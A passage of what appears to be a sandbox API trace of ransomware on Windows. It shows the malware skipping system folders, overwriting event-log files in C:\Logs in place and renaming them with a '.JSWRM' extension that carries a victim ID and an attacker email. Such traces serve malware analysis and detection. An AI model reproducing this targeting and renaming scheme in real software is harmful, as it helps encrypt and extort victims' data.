lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0066.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0066.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchWideChar=66, lpMultiByteStr=0x22bf60, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 66 [0066.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0066.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0066.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchWideChar=66, lpMultiByteStr=0x22beb0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 66 [0066.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0066.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0066.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0066.333] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.333] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.333] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.333] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.341] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.341] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.341] CloseHandle (hObject=0x450) returned 1 [0066.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0066.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0066.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0066.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0066.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0066.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0066.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.344] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0066.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0066.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0066.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0066.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0066.344] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2=".") returned 1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="..") returned 1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="...") returned 1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="windows") returned -1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="recovery") returned -1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="perflogs") returned -1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="documents and settings") returned 1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.344] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="system volume information") returned -1 [0066.345] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="msocache") returned -1 [0066.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0066.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchWideChar=72, lpMultiByteStr=0x22c6f0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 72 [0066.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0066.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0066.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchWideChar=72, lpMultiByteStr=0x22c7a0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 72 [0066.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0066.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0066.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0066.345] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.345] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.345] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.345] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.353] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.353] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.353] CloseHandle (hObject=0x450) returned 1 [0066.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0066.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0066.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0066.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0066.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0066.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x1f19f0 [0066.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0066.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0066.355] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0066.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0066.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0066.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0066.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0066.357] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2=".") returned 1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="..") returned 1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="...") returned 1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="windows") returned -1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="recovery") returned -1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="perflogs") returned -1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="documents and settings") returned 1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="$RECYCLE.BIN") returned 1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="system volume information") returned -1 [0066.357] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="msocache") returned -1 [0066.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0066.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0066.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchWideChar=70, lpMultiByteStr=0x22c6f0, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 70 [0066.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0066.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0066.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0066.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchWideChar=70, lpMultiByteStr=0x22c538, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 70 [0066.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0066.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0066.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0066.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0066.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0066.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0066.357] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0066.366] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0066.366] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2491b8 [0066.366] ReadFile (in: hFile=0x450, lpBuffer=0x2491b8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0066.371] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0066.371] WriteFile (in: hFile=0x450, lpBuffer=0x2491b8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2491b8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0066.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2491b8 | out: hHeap=0x1e0000) returned 1 [0066.372] CloseHandle (hObject=0x450) returned 1 [0066.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0066.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0066.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0066.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0066.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0066.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0066.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0066.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0066.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0066.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0066.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0066.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x1f19f0 [0066.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0066.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0066.374] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0066.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0066.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0066.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0066.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0066.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0066.374] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, 